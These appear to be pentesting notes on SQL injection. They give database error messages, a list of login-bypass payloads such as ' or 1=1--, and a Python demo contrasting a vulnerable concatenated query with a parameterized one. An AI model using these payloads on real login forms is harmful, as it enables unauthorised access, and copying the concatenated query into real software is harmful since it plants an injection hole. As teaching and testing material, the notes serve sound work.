  1. General info
  2. Injection (SQLi)
    1. Easy Injection Tests (aka Login Tricks)
    2. Automatic scanning with SQLMap
  3. Resources / More info
    1. Links
      1. Cheatsheets and more
      2. Good reads

General info

There are four common database types, and each one reports errors differently:

  1. MySQL
    • error example: The used SELECT statements have a different number of columns
  2. MSSQL
    • error example: All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists
  3. Oracle
    • error example:
  4. PostgreSQL
    • error example: Each UNION query must have the same number of columns

Injection (SQLi)

Easy Injection Tests (aka Login Tricks)

  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1-- -
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
  • 'UNION SELECT 1, 'admin', 'password', 1--
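
Why these strings work, and what stops them, shown as an added example (not part of the original notes): a login query built by string concatenation next to the same query with placeholders, run against a constructed in-memory SQLite table. The table, credentials and function names are assumptions; SQLite does not treat # as a comment, so that variant surfaces as a SQL error instead of a bypass.

```python
import sqlite3

def make_db():
    # Constructed sample data: one user in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 's3cret-constructed')")
    return db

def login_concat(db, user, password):
    """Vulnerable form: user input becomes part of the SQL text."""
    sql = ("SELECT name FROM users WHERE name = '" + user +
           "' AND password = '" + password + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        # The stray quote reached the parser; in logs this is a detection signal.
        return "sql-error"
    return row[0] if row else None

def login_param(db, user, password):
    """Hardened form: placeholders keep the input as data, never as SQL."""
    row = db.execute(
        "SELECT name FROM users WHERE name = ? AND password = ?",
        (user, password),
    ).fetchone()
    return row[0] if row else None

# A subset of the test strings from the list above.
TESTS = ["admin' --", "admin' #", "admin'/*", "' or 1=1--", "' or 1=1/*"]

def compare(tests=TESTS):
    """Return {input: (concatenated result, parameterized result)}."""
    db = make_db()
    return {t: (login_concat(db, t, "x"), login_param(db, t, "x")) for t in tests}

if __name__ == "__main__":
    for payload, (weak, safe) in compare().items():
        print(f"{payload!r:16} concat={weak!r:12} param={safe!r}")
```

With placeholders every test string is simply a username that does not exist, so the hardened function returns None for all of them.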

Automatic scanning with SQLMap


Resources / More info

SQL Injection Hacking Tools

Cheatsheets and more

SQLi Cheat Sheet - netsparker
SQLi Cheat Sheet - pentestmonkey

Good reads

MSSQL Injection PWNage
Drupageddon